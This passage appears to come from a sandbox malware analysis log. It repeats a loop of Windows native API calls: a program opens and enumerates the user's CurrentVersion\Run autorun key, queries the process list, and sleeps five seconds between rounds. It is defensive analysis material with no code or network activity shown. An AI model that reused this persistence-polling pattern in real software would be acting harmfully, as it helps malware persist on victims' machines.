Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.245] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.245] NtClose (Handle=0x274) returned 0x0 [0181.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.257] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.257] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.258] NtClose (Handle=0x274) returned 0x0 [0181.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.267] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.267] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.267] NtClose (Handle=0x274) returned 0x0 [0181.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.279] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.280] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.280] NtClose (Handle=0x274) returned 0x0 [0181.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.293] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.294] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.294] NtClose (Handle=0x274) returned 0x0 [0181.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.304] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.304] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.304] NtClose (Handle=0x274) returned 0x0 [0181.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.320] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.321] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.321] NtClose (Handle=0x274) returned 0x0 [0181.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.350] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.351] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.351] NtClose (Handle=0x274) returned 0x0 [0181.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.361] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.361] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.361] NtClose (Handle=0x274) returned 0x0 [0181.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.372] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.378] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.378] NtClose (Handle=0x274) returned 0x0 [0181.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.387] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.388] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.388] NtClose (Handle=0x274) returned 0x0 [0181.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.397] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.397] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.398] NtClose (Handle=0x274) returned 0x0 [0181.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.408] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.410] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.410] NtClose (Handle=0x274) returned 0x0 [0181.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.522] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.526] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.526] NtClose (Handle=0x274) returned 0x0 [0181.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.531] NtFreeVirtualMemory 